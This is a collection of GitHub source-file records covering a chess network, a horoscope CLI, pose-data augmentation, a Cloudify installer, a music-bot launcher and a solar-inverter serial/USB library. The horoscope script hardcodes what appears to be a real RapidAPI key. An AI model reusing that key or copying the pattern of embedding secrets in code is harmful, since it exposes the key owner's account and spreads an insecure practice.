it's our turn to move\n # so the `value_estimate` is -1.0\n priors = {} # no moves after checkmate\n value_estimate = -1.0\n return priors, value_estimate\n\n\nif __name__ == \"__main__\":\n net = AlphaNet()\n\n x = torch.zeros((6, 18, 8, 8))\n policy, value = net(x)\n print(policy.shape, value.shape)\n","repo_name":"DinoraProject/dinora_chess","sub_path":"dinora/models/alphanet.py","file_name":"alphanet.py","file_ext":"py","file_size_in_byte":11063,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"13428048308","text":"import os\nimport socket\n\nfrom dotenv import load_dotenv\nload_dotenv()\n\nSERVICE_NAME = os.getenv(\"SERVICE_NAME\")\nSERVICE_ENV = os.getenv(\"SERVICE_ENV\")\n\nLOGGING_CONFIG = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"papertrail\": {\n \"format\": f\"%(asctime)s - {SERVICE_NAME}_{SERVICE_ENV} - %(levelname)s - %(name)s - %(message)s\",\n \"datefmt\": '%Y-%m-%d %H:%M:%S %Z',\n }\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"level\": \"DEBUG\",\n \"formatter\": \"papertrail\",\n \"stream\": \"ext://sys.stdout\"\n }\n },\n \"loggers\": {\n \"\": {\n \"level\": \"DEBUG\",\n \"handlers\": [\"console\"]\n }\n }\n}\n","repo_name":"ash-ishh/CSPostsCompiler","sub_path":"logging_config.py","file_name":"logging_config.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74229396642","text":"import requests\n\n\ndef get_info(sign, day):\n \"\"\"This function makes the API call to get the result\n of the desired zodiac sign for the desired day.\"\"\"\n\n base_url = \"https://sameer-kumar-aztro-v1.p.rapidapi.com/\"\n\n parameters = {\"sign\": sign, \"day\": day}\n\n headers = {'x-rapidapi-host': \"sameer-kumar-aztro-v1.p.rapidapi.com\",\n 'x-rapidapi-key':\n \"9b63804a3cmsh368b3af884ede93p1e0b5djsn7ebb3eb30986\"}\n\n robj = requests.post(base_url, headers=headers, params=parameters)\n return_object = robj.json()\n if robj.status_code == 200:\n res = f'''We see that you are {sign.capitalize()}. Your horoscope for the date\n {return_object['current_date']} says that : '{return_object[\"description\"]}'\\n\n You are compatible with {return_object[\"compatibility\"]}. Your lucky color,\n number and time are {return_object[\"color\"]}, {return_object[\"lucky_number\"]}\n and {return_object[\"lucky_time\"]} respectively.\\n\n You are expected to be in '{return_object[\"mood\"]}' mood.'''\n\n return res\n else:\n return \"Sorry! No result found.\"\n\n\ndef bad_input(container, code):\n \"\"\"This function is used to handle bad user input and gives the user a choice\n to either QUIT the game or enter a valid input.\"\"\"\n\n print(\"\\nThis is NOT a valid entry.\")\n yn = input(\"Are you requesting to QUIT? (press y / n) : \")\n if yn == 'y':\n print(\"\\nThankyou for holding up!\\n\")\n return 1\n elif yn == 'n':\n print(\"\\nPlease enter a valid number.\\n\")\n return 0\n else:\n print(\"\\nBad Input Again!\\nBye Bye.\\n\")\n return 1\n\n\ndef main():\n \"\"\"This function displays the complete menu to the user and asks\n for user input. It also invokes bad_input() function in case of\n an invalid entry by the user. It then invokes the get_info() function\n to collect the required result and print it.\"\"\"\n\n info_zodiac = '''\n Hello and Welcome to your Horoscope Destination!\\n\\n\n Select your Zodiac Sign from the list below. Press the code\n along the Sign to proceed.\\n\n 1. Aries\n 2. Taurus\n 3. Gemini\n 4. Cancer\n 5. Leo\n 6. Virgo\n 7. Libra\n 8. Scorpio\n 9. Sagittarius\n 10. Capricorn\n 11. Aquarius\n 12. Pisces\n Press any other character to QUIT.\\n'''\n\n info_day = '''\n Which day's horoscope are you looking for?\\n\n 1. Yesterday\n 2. Today\n 3. Tomorrow\n Press any other character to QUIT.\\n'''\n\n zodiac = {'1': 'aries', '2': 'taurus', '3': 'gemini',\n '4': 'cancer', '5': 'leo', '6': 'virgo', '7': 'libra',\n '8': 'scorpio', '9': 'sagittarius', '10': 'capricorn',\n '11': 'aquarius', '12': 'pisces'}\n day = {'1': \"yesterday\", '2': \"today\", '3': \"tomorrow\"}\n\n zodiac_code, day_code = 0, 0\n\n print(info_zodiac)\n\n while True:\n\n while True:\n zodiac_code = input(\"Press the zodiac code : \")\n if not zodiac.get(zodiac_code, 0):\n if bad_input(zodiac, zodiac_code):\n return\n else:\n continue\n break\n\n print(info_day)\n\n while True:\n day_code = input(\"Press the day code : \")\n if not day.get(day_code, 0):\n if bad_input(day, day_code):\n return\n else:\n continue\n break\n result = get_info(zodiac[zodiac_code], day[day_code])\n print(f'\\n\\nWe have an astro prediction for you!\\n\\n\" {result} \"\\n')\n\n\nif __name__ == '__main__':\n \"\"\"The main driver code.\"\"\"\n main()\n","repo_name":"python-geeks/Automation-scripts","sub_path":"horoscope_destination/horoscope.py","file_name":"horoscope.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","stars":719,"dataset":"github-code","pt":"54"} +{"seq_id":"15515477542","text":"\"\"\"\nEvolution of 3D human skeleton.\nauthor: Nicholas Li\ncontact: nicholas.li@connect.ust.hk\n\"\"\"\nimport sys\nsys.path.append(\"../\")\n\nfrom libs.evolution.genetic import evolution\nfrom libs.evolution.parameter import parse_arg\n\nimport os\nimport logging\nfrom scipy.spatial.transform import Rotation as R\nimport numpy as np\n\ndef cast_to_float(dic, dtype=np.float32):\n # cast to float 32 for space saving\n for key in dic.keys():\n dic[key] = dic[key].astype(dtype)\n return dic\n\ndef random_rotation(pose, sigma=360):\n # apply random rotation to equivalently augment viewpoints\n pose = pose.reshape(32, 3)\n hip = pose[0].copy().reshape(1, 3)\n x = np.random.normal(scale=sigma)\n y = np.random.normal(scale=sigma)\n z = np.random.normal(scale=sigma)\n r = R.from_euler('xyz', [x, y, z], degrees=True)\n rotated = r.as_dcm() @ (pose-hip).T\n return (rotated.T + hip).reshape(-1)\n\ndef initialize_population(data_dic, opt):\n \"\"\"\n Initialize a population for later evolution.\n \"\"\"\n # down-sample the raw data if used for weakly-supervised experiments\n if opt.WS and opt.SS.startswith(\"0.\") and opt.SS.endswith(\"S1\"):\n # a fraction of S1 data for H36M\n ratio = float(opt.SS.split('S')[0])\n # randomly sample a portion of 3D data\n sampled_dic = {}\n # sample each video\n for key in data_dic.keys():\n if key[0] != 1:\n continue\n total = len(data_dic[key])\n sampled_num = int(ratio*total)\n chosen_indices = np.random.choice(total, sampled_num, replace=False)\n sampled_dic[key] = data_dic[key][chosen_indices].copy()\n initial_population = np.concatenate(list(sampled_dic.values()), axis=0) \n elif opt.WS and opt.SS.startswith(\"S\"):\n # a collection of data from a few subjects\n # delete unused subjects\n sub_list = [int(opt.SS[i]) for i in range(1, len(opt.SS))]\n keys_to_delete = []\n for key in data_dic.keys():\n if key[0] not in sub_list:\n keys_to_delete.append(key)\n for key in keys_to_delete: \n del data_dic[key] \n initial_population = np.concatenate(list(data_dic.values()), axis=0) \n else:\n # do not perform down-sampling\n initial_population = np.concatenate(list(data_dic.values()), axis=0) \n return initial_population\n\ndef initialize_model_file(opt):\n if opt.A:\n import torch\n model = torch.load(os.path.join(opt.ckpt_dir, \"model.th\"))\n stats = np.load(os.path.join(opt.ckpt_dir, \"stats.npy\")).item()\n cameras = np.load(\"../data/human3.6M/cameras.npy\").item()\n model_file = {\"model\":model, \"stats\":stats, \"cams\":list(cameras.values())}\n else:\n model_file = None \n return model_file\n\n\ndef split_and_save(evolved_population):\n \"\"\"\n Split and save the evolved dataset into training and validation set.\n \"\"\"\n training_indices = np.random.choice(len(evolved_population), int(0.95*len(evolved_population)), replace=False)\n testing_indices = np.delete(np.arange(len(evolved_population)), training_indices)\n training_poses = evolved_population[training_indices]\n testing_poses = evolved_population[testing_indices]\n\n temp_subject_list = [1, 5, 6, 7, 8]\n train_set_3d = {}\n poses_list = np.array_split(training_poses, len(temp_subject_list))\n for subject_idx in range(len(temp_subject_list)):\n train_set_3d[(temp_subject_list[subject_idx], 'n/a', 'n/a')] =\\\n poses_list[subject_idx] \n # testing\n testing_poses = evolved_population[testing_indices]\n temp_subject_list = [9,11]\n test_set_3d = {}\n poses_list = np.array_split(testing_poses, len(temp_subject_list))\n for subject_idx in range(len(temp_subject_list)):\n test_set_3d[(temp_subject_list[subject_idx], 'n/a', 'n/a')] =\\\n poses_list[subject_idx] \n np.save('../data/human3.6M/h36m/numpy/threeDPose_train_split.npy', train_set_3d)\n np.save('../data/human3.6M/h36m/numpy/threeDPose_test.npy', test_set_3d) \n return\n\ndef visualize(initial_population, evolved_population):\n \"\"\"\n Visualize the augmented dataset\n \"\"\"\n import matplotlib.pyplot as plt\n from genetic import show3Dpose\n def get_zmin(pose):\n return pose.reshape(32,3)[:,2].min()\n # initial population\n chosen_indices = np.random.choice(len(initial_population), 9, replace=False)\n plt.figure()\n for idx in range(9):\n ax = plt.subplot(3, 3, idx+1, projection='3d')\n pose = initial_population[chosen_indices[idx]]\n show3Dpose(pose, ax) \n plt.title(\"{:d}:{:.2f}\".format(chosen_indices[idx], get_zmin(pose)))\n plt.tight_layout() \n # after evolution\n chosen_indices = np.random.choice(len(evolved_population) - len(initial_population), 9, replace=False)\n plt.figure()\n for idx in range(9):\n ax = plt.subplot(3, 3, idx+1, projection='3d')\n pose = evolved_population[chosen_indices[idx] + len(initial_population)]\n show3Dpose(pose, ax) \n plt.title(\"{:d}:{:.2f}\".format(chosen_indices[idx] + len(initial_population), get_zmin(pose)))\n plt.tight_layout() \n return\n\ndef main():\n logging.basicConfig(level=logging.INFO,\n format=\"[%(asctime)s]: %(message)s\"\n ) \n # parse command line input\n opt = parse_arg() \n if opt.generate:\n # get the training set of human 3.6M \n data_dic = np.load(opt.data_path, allow_pickle=True).item()\n initial_population = initialize_population(data_dic, opt)\n # load a pre-trained model for active searching (optional)\n model_file = initialize_model_file(opt) \n evolved_population = evolution(initial_population,\n opt,\n model_file=model_file\n ) \n if opt.split:\n split_and_save(evolved_population)\n \n if opt.visualize:\n visualize(initial_population, evolved_population)\n \nif __name__ == \"__main__\":\n main()","repo_name":"Nicholasli1995/EvoSkeleton","sub_path":"tools/evolve.py","file_name":"evolve.py","file_ext":"py","file_size_in_byte":6145,"program_lang":"python","lang":"en","doc_type":"code","stars":319,"dataset":"github-code","pt":"54"} +{"seq_id":"28876304105","text":"def jumpingOnClouds(c):\n # Write your code here\n cloud = 0\n jump = 0\n while cloud < len(c)-2:\n jump += 1\n if c[cloud+2] == 1:\n cloud = cloud + 1\n else:\n cloud = cloud + 2\n \n if cloud == len(c)-2:\n jump = jump + 1\n \n return jump\n","repo_name":"SachinRatnam/HackerRank","sub_path":"Problem Solving/Jumping on the Clouds/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30520475080","text":"import os\nimport platform\nimport subprocess\nfrom cloudify import ctx\nfrom cloudify.exceptions import (\n NonRecoverableError, HttpException, OperationRetry\n)\n\n\ndef execute_command(command, extra_args=None):\n\n ctx.logger.debug('command: {0}.'.format(repr(command)))\n\n subprocess_args = {\n 'args': command,\n 'stdout': subprocess.PIPE,\n 'stderr': subprocess.PIPE\n }\n if extra_args is not None and isinstance(extra_args, dict):\n subprocess_args.update(extra_args)\n\n ctx.logger.debug('subprocess_args {0}.'.format(subprocess_args))\n\n process = subprocess.Popen(**subprocess_args)\n output, error = process.communicate()\n\n ctx.logger.debug('command: {0} '.format(repr(command)))\n ctx.logger.debug('output: {0} '.format(output))\n ctx.logger.debug('error: {0} '.format(error))\n ctx.logger.debug('process.returncode: {0} '.format(process.returncode))\n\n if process.returncode:\n ctx.logger.error('Running `{0}` returns {1} error: {2}.'\n .format(repr(command), process.returncode,\n repr(error)))\n return False\n\n return output\n\n\ndef download_service(service_name):\n service_path = \"/usr/bin/\" + service_name\n if not os.path.isfile(service_path):\n cfy_binary = ctx.download_resource('resources/{}'\n .format(service_name))\n ctx.logger.debug('{} downloaded.'.format(service_name))\n if execute_command(['sudo', 'cp', cfy_binary, service_path]) is False:\n raise NonRecoverableError(\"Can't copy {}.\".format(service_path))\n # fix file attributes\n if execute_command(['sudo', 'chmod', '555', service_path]) is False:\n raise NonRecoverableError(\"Can't chmod {}.\".format(service_path))\n if execute_command(['sudo', 'chown', 'root:root', service_path]) is False:\n raise NonRecoverableError(\"Can't chown {}.\".format(service_path))\n ctx.logger.debug('{} attributes fixed'.format(service_name))\n\n\nif __name__ == '__main__':\n full_install = ctx.node.properties.get('full_install', 'all')\n\n try:\n download_service(\"cfy-go\")\n if full_install == \"all\":\n # download cluster provider\n download_service(\"cfy-kubernetes\")\n\n # download scale tools\n download_service(\"cfy-autoscale\")\n except HttpException:\n ctx.logger.info('Installing build requirements.')\n linux_distro = ctx.node.properties.get('linux_distro', 'centos')\n\n if not linux_distro:\n distro, _, _ = \\\n platform.linux_distribution(full_distribution_name=False)\n linux_distro = distro.lower()\n\n if 'centos' in linux_distro:\n\n build_output = execute_command(['sudo', 'yum', 'install', '-q',\n '-y', 'git'])\n if build_output is False:\n raise OperationRetry('Failed to install git')\n\n import_gpg_key = execute_command([\n 'sudo', 'rpm', '--import',\n 'https://mirror.go-repo.io/centos/RPM-GPG-KEY-GO-REPO'])\n if import_gpg_key is False:\n raise OperationRetry('Failed to import Go GPG key')\n\n go_repo_temp = ctx.download_resource('resources/go.repo')\n execute_command(['sudo', 'mv', go_repo_temp,\n '/etc/yum.repos.d/go.repo'])\n\n go_install = execute_command(['sudo', 'yum', '-y', 'install',\n 'golang'])\n if go_install is False:\n raise OperationRetry('Failed to import Go GPG key')\n\n elif 'ubuntu' in linux_distro:\n execute_command(['sudo', 'add-apt-repository',\n 'ppa:longsleep/golang-backports'])\n execute_command(['sudo', 'apt-get', 'update'])\n execute_command(['sudo', 'apt-get', 'install', 'golang-go', 'git'])\n else:\n raise NonRecoverableError('Unsupported platform.')\n","repo_name":"cloudify-incubator/cloudify-kubernetes-provider","sub_path":"examples/cluster_blueprint/scripts/buildtools/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"37110638774","text":"import os\n\nimport ScoreCalculation\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\nos.environ[\"SM_FRAMEWORK\"] = \"tf.keras\"\nfrom tensorflow import keras\n\nimport tensorflow as tf\n\nEUnets = [\"EUnet5-5-5\", \"EUnet5-5-4\", \"EUnet5-4-4\", \"EUnet5-5-3\", \"EUnet5-5-2\", \"EUnet5-4-3\", \"EUnet4-5-5\",\n \"EUnet4-4-4\", \"EUnet4-4-2\", \"EUnet4-4-1\", \"EUnet4-3-2\", \"EUnet3-3-3\"]\nAllNueralNetworks = [\"VGGU19net\", \"ResNextUnet\", \"ResUnet\", \"Inceptionv3\", \"inceptionresnetv2\", \"EUnet5-5-3\",\n \"Unet2plus\", \"Unet3plus\", \"Unet\", \"EUnetVGG19_5-4-1_FinalVersion_Shear_Dropout0.1_FinalDropout0.5\",\n \"EUnetVGG19_5-3-2(3Dropout)\"]\n\n\ndef load_model(name_path, type):\n if (type == \"EUnets\"):\n model = keras.models.load_model(\"EUnets/\" + name_path + '.hdf5',\n custom_objects={'bce_dice_loss': ScoreCalculation.bce_dice_loss,\n 'iou': ScoreCalculation.iou,\n 'dice_coef': ScoreCalculation.dice_coef, 'tf': tf})\n return model\n elif (type == \"All\"):\n model = keras.models.load_model(\"New_modelsWithoutDropout/\" + name_path + '.hdf5',\n custom_objects={'bce_dice_loss': ScoreCalculation.bce_dice_loss,\n 'iou': ScoreCalculation.iou,\n 'dice_coef': ScoreCalculation.dice_coef, 'tf': tf})\n return model\n","repo_name":"Kas-ES/Bachelor_Project_ComputerVision","sub_path":"LoadModels.py","file_name":"LoadModels.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23413960451","text":"import asyncio\nimport importlib\n\nfrom pyrogram import idle\nfrom pytgcalls.exceptions import NoActiveGroupCall\n\nimport config\nfrom AnonXMusic import LOGGER, app, userbot\nfrom AnonXMusic.core.call import Anony\nfrom AnonXMusic.misc import sudo\nfrom AnonXMusic.plugins import ALL_MODULES\nfrom AnonXMusic.utils.database import get_banned_users, get_gbanned\nfrom config import BANNED_USERS\n\n\nasync def init():\n if (\n not config.STRING1\n and not config.STRING2\n and not config.STRING3\n and not config.STRING4\n and not config.STRING5\n ):\n LOGGER(__name__).error(\"Assistant client variables not defined, exiting...\")\n exit()\n await sudo()\n try:\n users = await get_gbanned()\n for user_id in users:\n BANNED_USERS.add(user_id)\n users = await get_banned_users()\n for user_id in users:\n BANNED_USERS.add(user_id)\n except:\n pass\n await app.start()\n for all_module in ALL_MODULES:\n importlib.import_module(\"AnonXMusic.plugins\" + all_module)\n LOGGER(\"AnonXMusic.plugins\").info(\"تم استدعاء المودات بنجاح...\")\n await userbot.start()\n await Anony.start()\n try:\n await Anony.stream_call(\"https://telegra.ph/file/18eb1dfc2790e12ada2bc.jpg\")\n except NoActiveGroupCall:\n LOGGER(\"AnonXMusic\").error(\n \"من فضلك اطفئ مكالمة الفيديو في جروب اللوج\\القناة.\\n\\nجار ايقاف البوت...\"\n )\n exit()\n except:\n pass\n await Anony.decorators()\n LOGGER(\"AnonXMusic\").info(\n \"\\x41\\x6e\\x6f\\x6e\\x58\\x20\\x4d\\x75\\x73\\x69\\x63\\x20\\x42\\x6f\\x74\\x20\\x53\\x74\\x61\\x72\\x74\\x65\\x64\\x20\\x53\\x75\\x63\\x63\\x65\\x73\\x73\\x66\\x75\\x6c\\x6c\\x79\\x2e\\n\\n\\x44\\x6f\\x6e'\\x74\\x20\\x66\\x6f\\x72\\x67\\x65\\x74\\x20\\x74\\x6f\\x20\\x76\\x69\\x73\\x69\\x74\\x20\\x40\\x46\\x61\\x6c\\x6c\\x65\\x6e\\x41\\x73\\x73\\x6f\\x63\\x69\\x61\\x74\\x69\\x6f\\x6e\"\n )\n await idle()\n await app.stop()\n await userbot.stop()\n LOGGER(\"AnonXMusic\").info(\"Stopping AnonX Music Bot...\")\n\n\nif __name__ == \"__main__\":\n asyncio.get_event_loop().run_until_complete(init())\n","repo_name":"mahmoud-gg/anon1","sub_path":"AnonXMusic/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17266159195","text":"\"\"\"\nMPP Solar Inverter Command Library\nreference library of serial commands (and responses) for PIP-4048MS inverters\nmppinverter.py\n\"\"\"\n\nimport serial\nimport time\nimport re\nimport logging\nimport json\nimport glob\nimport os\nfrom os import path\n\n# from builtins import bytes\n\nfrom .mppcommand import mppCommand\n\nlog = logging.getLogger('MPP-Solar')\n\n\nclass MppSolarError(Exception):\n pass\n\n\nclass NoDeviceError(MppSolarError):\n pass\n\n\nclass NoTestResponseDefined(MppSolarError):\n pass\n\n\ndef getDataValue(data, key):\n \"\"\"\n Get value from data dict (loaded from JSON) or return empty String\n \"\"\"\n if key == 'regex':\n if 'regex' in data and data['regex']:\n return re.compile(data['regex'])\n else:\n return None\n if key in data:\n return data[key]\n else:\n return \"\"\n\n\ndef isInverterSupported(inverter_model, json):\n \"\"\"\n Determine if the command loaded from json supports the supplied inverter\n \"\"\"\n supports = getDataValue(json, 'supports')\n nosupports = getDataValue(json, 'nosupports')\n log.debug(\"-----No supports {}\".format(nosupports))\n # Some commands are specifically not supported by some models\n if inverter_model in nosupports:\n log.debug(\"Command {} not supported on inverter {}\".format(getDataValue(json, 'name'), inverter_model))\n return False\n # JSON command support all inverters unless specified\n if supports == \"\":\n log.debug(\"Command {} supported all inverters\".format(getDataValue(json, 'name')))\n return True\n elif inverter_model in supports:\n log.debug(\"Command {} supported by model {}\".format(getDataValue(json, 'name'), inverter_model))\n return True\n else:\n return False\n\n\ndef getCommandsFromJson(inverter_model):\n \"\"\"\n Read in all the json files in the commands subdirectory\n this builds a list of all valid commands\n \"\"\"\n log.info(\"Loading commands for inverter model: {}\".format(inverter_model))\n COMMANDS = []\n here = path.abspath(path.dirname(__file__))\n files = glob.glob(here + '/commands/*.json')\n if inverter_model == 'PI18':\n protocol = 'PI18'\n else:\n protocol = None\n\n for file in sorted(files):\n log.debug(\"Loading command information from {}\".format(file))\n with open(file) as f:\n try:\n data = json.load(f)\n except Exception:\n log.debug(\"Error processing JSON in {}\".format(file))\n continue\n # Does this json support the supplied inverter model?\n if isInverterSupported(inverter_model, data):\n log.info(\"... command {} loaded for inverter model: {}\".format(getDataValue(data, 'name'), inverter_model))\n COMMANDS.append(mppCommand(getDataValue(data, 'name'), getDataValue(data, 'description'),\n getDataValue(data, 'type'), getDataValue(data, 'response'),\n getDataValue(data, 'test_responses'), getDataValue(data, 'regex'),\n help=getDataValue(data, 'help'), crc_function=getDataValue(data, 'crc'), prefix=getDataValue(data, 'prefix'), protocol=protocol))\n return COMMANDS\n\n\ndef isTestDevice(serial_device):\n \"\"\"\n Determine if this instance is just a Test connection\n \"\"\"\n if serial_device == 'TEST':\n return True\n return False\n\n\ndef isDirectUsbDevice(serial_device):\n \"\"\"\n Determine if this instance is using direct USB connection\n (instead of a serial connection)\n \"\"\"\n if not serial_device:\n return False\n match = re.search(\"^.*hidraw\\\\d$\", serial_device)\n if match:\n log.debug(\"Device matches hidraw regex\")\n return True\n match = re.search(\"^.*mppsolar\\\\d$\", serial_device)\n if match:\n log.debug(\"Device matches mppsolar regex\")\n return True\n return False\n\n\nclass mppInverter:\n \"\"\"\n MPP Solar Inverter Command Library\n - represents an inverter (and the commands the inverter supports)\n \"\"\"\n\n def __init__(self, serial_device=None, baud_rate=2400, inverter_model='standard'):\n if not serial_device:\n raise NoDeviceError(\"A device to communicate by must be supplied, e.g. /dev/ttyUSB0\")\n self._baud_rate = baud_rate\n self._serial_device = serial_device\n self._inverter_model = inverter_model\n self._serial_number = None\n self._test_device = isTestDevice(serial_device)\n self._direct_usb = isDirectUsbDevice(serial_device)\n self._commands = getCommandsFromJson(inverter_model)\n\n def __str__(self):\n \"\"\"\n \"\"\"\n inverter = \"\\n\"\n if self._direct_usb:\n inverter = \"Inverter connected via USB on {}\".format(self._serial_device)\n elif self._test_device:\n inverter = \"Inverter connected as a TEST\"\n else:\n inverter = \"Inverter connected via serial port on {}\".format(self._serial_device)\n inverter += \"\\n-------- List of supported commands --------\\n\"\n if self._commands:\n for cmd in self._commands:\n inverter += str(cmd)\n return inverter\n\n def getSerialNumber(self):\n if self._serial_number is None:\n result = self.execute(\"QID\")\n # print (result)\n if result:\n response = result.getResponseDict()\n # print (byte_response)\n if response:\n self._serial_number = response[\"serial_number\"][0]\n return self._serial_number\n\n def getAllCommands(self):\n \"\"\"\n Return list of defined commands\n \"\"\"\n return self._commands\n\n def getResponse(self, cmd):\n \"\"\"\n Execute command and return the byte_response\n \"\"\"\n result = self.execute(cmd)\n if not result:\n return \"\"\n else:\n return result.getResponse()\n\n def getInfluxLineProtocol2(self, cmd):\n \"\"\"\n Execute command and return the reponse as a Influx Line Protocol messages\n \"\"\"\n result = self.execute(cmd)\n if not result:\n return \"\"\n else:\n return result.getInfluxLineProtocol2()\n\n def getInfluxLineProtocol(self, cmd):\n \"\"\"\n Execute command and return the reponse as a Influx Line Protocol messages\n \"\"\"\n result = self.execute(cmd)\n if not result:\n return \"\"\n else:\n return result.getInfluxLineProtocol()\n\n def getResponseDict(self, cmd):\n \"\"\"\n Execute command and return the reponse as a dict\n \"\"\"\n result = self.execute(cmd)\n if not result:\n return \"\"\n else:\n return result.getResponseDict()\n\n def _getCommand(self, cmd):\n \"\"\"\n Returns the mppcommand object of the supplied cmd string\n \"\"\"\n log.debug(\"Searching for cmd '{}'\".format(cmd))\n if not self._commands:\n log.debug(\"No commands found\")\n return None\n for command in self._commands:\n if not command.regex:\n if cmd == command.name:\n return command\n else:\n match = command.regex.match(cmd)\n if match:\n # log.debug(command.name, command.regex)\n log.debug(\"Matched: {} Value: {}\".format(command.name, match.group(1)))\n command.setValue(match.group(1))\n return command\n return None\n\n def _doTestCommand(self, command):\n \"\"\"\n Performs a test command execution\n \"\"\"\n command.clearByteResponse()\n log.debug('Performing test command with %s', command)\n command.setByteResponse(command.getTestByteResponse())\n return command\n\n def _doSerialCommand(self, command):\n \"\"\"\n Opens serial connection, sends command (multiple times if needed)\n and returns the byte_response\n \"\"\"\n command.clearByteResponse()\n response_line = None\n log.debug('port %s, baudrate %s', self._serial_device, self._baud_rate)\n try:\n with serial.serial_for_url(self._serial_device, self._baud_rate) as s:\n # Execute command multiple times, increase timeouts each time\n for x in range(1, 5):\n log.debug('Command execution attempt %d...', x)\n s.timeout = 1 + x\n s.write_timeout = 1 + x\n s.flushInput()\n s.flushOutput()\n s.write(command.byte_command)\n time.sleep(0.5 * x) # give serial port time to receive the data\n response_line = s.readline()\n log.debug('serial byte_response was: %s', response_line)\n command.setByteResponse(response_line)\n return command\n except Exception as e:\n log.warning(\"Serial read error: {}\".format(e))\n log.info('Command execution failed')\n return command\n\n def _doDirectUsbCommand(self, command):\n \"\"\"\n Opens direct USB connection, sends command (multiple times if needed)\n and returns the byte_response\n \"\"\"\n command.clearByteResponse()\n response_line = bytes()\n usb0 = None\n try:\n usb0 = os.open(self._serial_device, os.O_RDWR | os.O_NONBLOCK)\n except Exception as e:\n log.debug(\"USB open error: {}\".format(e))\n return command\n # Send the command to the open usb connection\n to_send = command.byte_command\n try:\n log.debug(\"length of to_send: {}\".format(len(to_send)))\n except: # noqa: E722\n import pdb\n pdb.set_trace()\n if len(to_send) <= 8:\n # Send all at once\n log.debug(\"1 chunk send\")\n time.sleep(0.35)\n os.write(usb0, to_send)\n elif len(to_send) > 8 and len(to_send) < 11:\n log.debug(\"2 chunk send\")\n time.sleep(0.35)\n os.write(usb0, to_send[:5])\n time.sleep(0.35)\n os.write(usb0, to_send[5:])\n else:\n while (len(to_send) > 0):\n log.debug(\"multiple chunk send\")\n # Split the byte command into smaller chucks\n send, to_send = to_send[:8], to_send[8:]\n log.debug(\"send: {}, to_send: {}\".format(send, to_send))\n time.sleep(0.35)\n os.write(usb0, send)\n time.sleep(0.25)\n # Read from the usb connection\n # try to a max of 100 times\n for x in range(100):\n # attempt to deal with resource busy and other failures to read\n try:\n time.sleep(0.15)\n r = os.read(usb0, 256)\n response_line += r\n except Exception as e:\n log.debug(\"USB read error: {}\".format(e))\n # Finished is \\r is in byte_response\n if (bytes([13]) in response_line):\n # remove anything after the \\r\n response_line = response_line[:response_line.find(bytes([13])) + 1]\n break\n log.debug('usb byte_response was: %s', response_line)\n \n # close file\n os.close(usb0)\n \n command.setByteResponse(response_line)\n return command\n\n def execute(self, cmd):\n \"\"\"\n Sends a command (as supplied) to inverter and returns the raw byte_response\n \"\"\"\n command = self._getCommand(cmd)\n if command is None:\n log.critical(\"Command not found\")\n return None\n elif (self._test_device):\n log.info('TEST connection: executing %s', command)\n return self._doTestCommand(command)\n elif (self._direct_usb):\n log.info('DIRECT USB connection: executing %s', command)\n return self._doDirectUsbCommand(command)\n else:\n log.info('SERIAL connection: executing %s', command)\n return self._doSerialCommand(command)\n","repo_name":"vavyen/mpp-solar","sub_path":"mppsolar/mppinverter.py","file_name":"mppinverter.py","file_ext":"py","file_size_in_byte":12217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"26561701616","text":"import pytest\n\nfrom mlconfig import getcls\nfrom mlconfig import instantiate\nfrom mlconfig import load\nfrom mlconfig import register\n\n\n@register\nclass Point(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return self.__class__.__name__ + '(x={}, y={})'.format(self.x, self.y)\n\n def __add__(self, other):\n return Point(self.x + other.x, self.y + other.y)\n\n\n@register\ndef add(x, y):\n return x + y\n\n\n@pytest.fixture\ndef obj():\n return {\n 'x1': 1,\n 'x2': 2,\n 'a': {\n 'name': 'Point',\n 'x': '${x1}',\n 'y': 3\n },\n 'b': {\n 'name': 'Point',\n 'x': '${x1}',\n 'y': 4\n },\n 'op': {\n 'name': 'add'\n }\n }\n\n\n@pytest.fixture\ndef conf(obj):\n return load(obj=obj)\n\n\ndef test_instantiate(conf, obj):\n assert conf['x1'] == conf['a']['x'] == conf['b']['x'] == obj['x1']\n assert conf['x1'] == conf['b']['x'] == conf['b']['x'] == obj['x1']\n\n instantiate(conf.a)\n\n a = instantiate(conf.a)\n b = instantiate(conf.b)\n conf = instantiate(conf.op, a, b)\n assert conf.x == 2 * obj['x1']\n assert conf.y == obj['a']['y'] + obj['b']['y']\n\n\ndef test_getcls(conf):\n assert getcls(conf['a']) == Point\n","repo_name":"narumiruna/mlconfig","sub_path":"tests/test_conf.py","file_name":"test_conf.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"54"} +{"seq_id":"37187083322","text":"import datetime\n\nimport pytest\n\nfrom holoscan.conditions import (\n BooleanCondition,\n CountCondition,\n DownstreamMessageAffordableCondition,\n MessageAvailableCondition,\n PeriodicCondition,\n)\nfrom holoscan.core import Application, Condition, ConditionType, Operator\nfrom holoscan.gxf import Entity, GXFCondition\n\n\nclass TestBooleanCondition:\n def test_kwarg_based_initialization(self, app, capfd):\n cond = BooleanCondition(fragment=app, name=\"boolean\", enable_tick=True)\n assert isinstance(cond, GXFCondition)\n assert isinstance(cond, Condition)\n assert cond.gxf_typename == 